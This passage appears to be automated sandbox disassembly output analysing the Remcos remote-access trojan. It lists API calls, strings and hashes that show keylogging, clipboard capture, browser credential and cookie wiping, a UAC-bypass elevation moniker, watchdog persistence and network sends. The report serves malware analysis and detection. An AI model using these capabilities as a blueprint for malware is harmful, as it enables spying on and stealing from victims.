                                                    • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                    • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                                    • API String ID: 65172268-860466531
                                                    • Opcode ID: a847706d2ec7f276a03c86ec47a9c399a93715c264525655b265b2837d28efb0
                                                    • Instruction ID: cd90af3caa6d69ca3e9ea8718b5663318d6259183dea3b669bddfb6979e5fbe1
                                                    • Opcode Fuzzy Hash: a847706d2ec7f276a03c86ec47a9c399a93715c264525655b265b2837d28efb0
                                                    • Instruction Fuzzy Hash: 9F718E316042415BC614FB32D8579AE77A4AED4718F40053FF582A21F2EF7CAA49C69F
                                                    APIs
                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                    • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                    • FindClose.KERNEL32(00000000), ref: 0040B517
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Find$CloseFile$FirstNext
                                                    • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                    • API String ID: 1164774033-3681987949
                                                    APIs
                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                    • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                    • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                    • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Find$Close$File$FirstNext
                                                    • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                    • API String ID: 3527384056-432212279
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                    • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                                      • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                      • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                      • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                    • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                    • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                                    • API String ID: 726551946-3025026198
                                                    APIs
                                                    • OpenClipboard.USER32 ref: 004159C7
                                                    • EmptyClipboard.USER32 ref: 004159D5
                                                    • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                                                    • GlobalLock.KERNEL32(00000000), ref: 004159FE
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                                                    • CloseClipboard.USER32 ref: 00415A5A
                                                    • OpenClipboard.USER32 ref: 00415A61
                                                    • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                    • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                    • CloseClipboard.USER32 ref: 00415A89
                                                      • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                    • String ID:
                                                    • API String ID: 3520204547-0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 0$1$2$3$4$5$6$7
                                                    • API String ID: 0-3177665633
                                                    APIs
                                                    • GetForegroundWindow.USER32 ref: 00409B3F
                                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                    • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                    • GetKeyState.USER32(00000010), ref: 00409B5C
                                                    • GetKeyboardState.USER32(?), ref: 00409B67
                                                    • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                    • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                    • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                    • String ID: X[G
                                                    • API String ID: 1888522110-739899062
                                                    APIs
                                                    • _wcslen.LIBCMT ref: 00406788
                                                    • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Object_wcslen
                                                    • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                    • API String ID: 240030777-3166923314
                                                    APIs
                                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,00474918), ref: 004198E8
                                                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419937
                                                    • GetLastError.KERNEL32 ref: 00419945
                                                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041997D
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                    • String ID:
                                                    • API String ID: 3587775597-0
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B499
                                                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B4CB
                                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B539
                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B546
                                                      • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B51C
                                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B571
                                                    • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B578
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,00473EE8,00000000), ref: 0041B580
                                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B593
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                    • String ID:
                                                    • API String ID: 2341273852-0
                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                                    • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                    • GetLastError.KERNEL32 ref: 00409A1B
                                                      • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                                    • TranslateMessage.USER32(?), ref: 00409A7A
                                                    • DispatchMessageA.USER32(?), ref: 00409A85
                                                    Strings
                                                    • Keylogger initialization failure: error , xrefs: 00409A32
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                    • String ID: Keylogger initialization failure: error
                                                    • API String ID: 3219506041-952744263
                                                    APIs
                                                    • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
                                                      • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                    • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                                                    • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressCloseCreateLibraryLoadProcsend
                                                    • String ID: SHDeleteKeyW$Shlwapi.dll
                                                    • API String ID: 2127411465-314212984
                                                    APIs
                                                      • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                      • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                      • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                      • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                      • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                                                      • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F3B
                                                    • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514D3
                                                    • IsValidCodePage.KERNEL32(00000000), ref: 0045152E
                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 0045153D
                                                    • GetLocaleInfoW.KERNEL32(?,00001001,00443CFC,00000040,?,00443E1C,00000055,00000000,?,?,00000055,00000000), ref: 00451585
                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00443D7C,00000040), ref: 004515A4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                    • String ID: Zb1Y/
                                                    • API String ID: 745075371-3232713500
                                                    APIs
                                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448089
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 00448101
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044812E
                                                    • _free.LIBCMT ref: 00448077
                                                      • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                      • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                    • _free.LIBCMT ref: 00448243
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                    • String ID: Zb1Y/
                                                    • API String ID: 1286116820-3232713500
                                                    APIs
                                                      • Part of subcall function 004124B7: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
                                                      • Part of subcall function 004124B7: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004124F5
                                                      • Part of subcall function 004124B7: RegCloseKey.ADVAPI32(00000000), ref: 00412500
                                                    • Sleep.KERNEL32(00000BB8), ref: 0040E603
                                                    • ExitProcess.KERNEL32 ref: 0040E672
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseExitOpenProcessQuerySleepValue
                                                    • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                    • API String ID: 2281282204-3981147832
                                                    APIs
                                                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                    • GetLastError.KERNEL32 ref: 0040B261
                                                    Strings
                                                    • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                    • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                    • UserProfile, xrefs: 0040B227
                                                    • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DeleteErrorFileLast
                                                    • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                    • API String ID: 2018770650-1062637481
                                                    • Opcode ID: d28def7c9280aa2a9c215b56ee10fe1cde150d05b3267e349477c4c7a3166050
                                                    • Instruction ID: b4925b9b145212f78872d6bf605c5cdf000d45b1535ad2fa459343da0bf9ff5a
                                                    • Opcode Fuzzy Hash: d28def7c9280aa2a9c215b56ee10fe1cde150d05b3267e349477c4c7a3166050
                                                    • Instruction Fuzzy Hash: 8C01623168410597CA0577B5ED6F8AE3624E921718F50017FF802731E6FF7A9A0586DE
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                    • GetLastError.KERNEL32 ref: 00416B02
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                    • String ID: SeShutdownPrivilege
                                                    • API String ID: 3534403312-3733053543
                                                    • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                    • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                                                    • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                    • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 004089AE
                                                      • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                      • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                    • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                      • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000), ref: 0040450E
                                                      • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                      • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,00475B90,?,?,00000000,00475B90,004017F3), ref: 004047FD
                                                      • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404808
                                                      • Part of subcall function 004047EB: CloseHandle.KERNELBASE(?,?,?,00000000,00475B90,004017F3), ref: 00404811
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                      • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                    • String ID:
                                                    • API String ID: 4043647387-0
                                                    • Opcode ID: a7e51efc752b031afc58cf73032587facd122f1466f4da27dadf7484b984f89b
                                                    • Instruction ID: 093ddd6807f9b365337d5cb0cb3505b04edbc5c9b0fee964739ae84c01535933
                                                    • Opcode Fuzzy Hash: a7e51efc752b031afc58cf73032587facd122f1466f4da27dadf7484b984f89b
                                                    • Instruction Fuzzy Hash: 50A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF506B71D2EF385E498B98
                                                    APIs
                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041982A,00000000,00000000), ref: 00419BDD
                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041982A,00000000,00000000), ref: 00419BF2
                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419BFF
                                                    • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041982A,00000000,00000000), ref: 00419C0A
                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419C1C
                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419C1F
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Service$CloseHandle$Open$ManagerStart
                                                    • String ID:
                                                    • API String ID: 276877138-0
                                                    • Opcode ID: 413273253f7cbae0f6bd9debfc52a3b8d95171ad4a984208ec06c12d82ce07c5
                                                    • Instruction ID: 029754fb73528063a62336f1848e5bb122dc48601db67947cc2268dfcf3d9ab0
                                                    • Opcode Fuzzy Hash: 413273253f7cbae0f6bd9debfc52a3b8d95171ad4a984208ec06c12d82ce07c5
                                                    • Instruction Fuzzy Hash: 2EF089755053146FD2115B31FC88DBF2AECEF85BA6B00043AF54193191DB68CD4595F5
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(00000000,?), ref: 00418ECF
                                                    • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F9B
                                                      • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B643
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$Find$CreateFirstNext
                                                    • String ID: @CG$XCG$>G
                                                    • API String ID: 341183262-3030817687
                                                    • Opcode ID: 31d89068bf95987aa1d708424f7af8f01dfdc6c5c004a65f310861421951643d
                                                    • Instruction ID: 4fcfe6ad4d4b9cbb37a9178feb6c4e4542e518df657a804f5f9e1d603b628f73
                                                    • Opcode Fuzzy Hash: 31d89068bf95987aa1d708424f7af8f01dfdc6c5c004a65f310861421951643d
                                                    • Instruction Fuzzy Hash: 408153315042405BC314FB61C892EEF73A9AFD1718F50493FF946671E2EF389A49C69A
                                                    APIs
                                                      • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                      • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                      • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                      • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443D03,?,?,?,?,?,?,00000004), ref: 00450B71
                                                    • _wcschr.LIBVCRUNTIME ref: 00450C01
                                                    • _wcschr.LIBVCRUNTIME ref: 00450C0F
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443D03,00000000,00443E23), ref: 00450CB2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                    • String ID: Zb1Y/
                                                    • API String ID: 4212172061-3232713500
                                                    • Opcode ID: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                    • Instruction ID: 5c43a781d12153ba09aec0d98fe41cbdfc67d130b552f984b55d9713d4fa54bc
                                                    • Opcode Fuzzy Hash: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                    • Instruction Fuzzy Hash: 8C613C39600306AAD729AB35CC42AAB7398EF05316F14052FFD05D7283E778ED49C769
                                                    APIs
                                                      • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                      • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                      • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                      • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                      • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                                    • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                                    • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                                                    • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                    • String ID: PowrProf.dll$SetSuspendState
                                                    • API String ID: 1589313981-1420736420
                                                    • Opcode ID: 760194600065aa930d76b91875d7e389ee81a04dff370ffb8731a3af4adaf024
                                                    • Instruction ID: a9af72b6b9eaf8561cd509fc4cf8b1c610007ddf0d7e7dc7bbe2947ee761077a
                                                    • Opcode Fuzzy Hash: 760194600065aa930d76b91875d7e389ee81a04dff370ffb8731a3af4adaf024
                                                    • Instruction Fuzzy Hash: B22161B0604741E6CA14F7B19856AFF225A9F80748F40883FB402A71D2EF7CDC89865F
                                                    APIs
                                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451512,?,00000000), ref: 0045128C
                                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451512,?,00000000), ref: 004512B5
                                                    • GetACP.KERNEL32(?,?,00451512,?,00000000), ref: 004512CA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InfoLocale
                                                    • String ID: ACP$OCP
                                                    • API String ID: 2299586839-711371036
                                                    • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                    • Instruction ID: c7787d6075dc192170befbe1ddc6ff7be643600d5f5c624e054d22ce072cfab5
                                                    • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                    • Instruction Fuzzy Hash: 9621C432A00100A7DB348F55C900B9773A6AF54B66F5685E6FC09F7232E73ADD49C399
                                                    APIs
                                                    • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A660
                                                    • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A674
                                                    • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67B
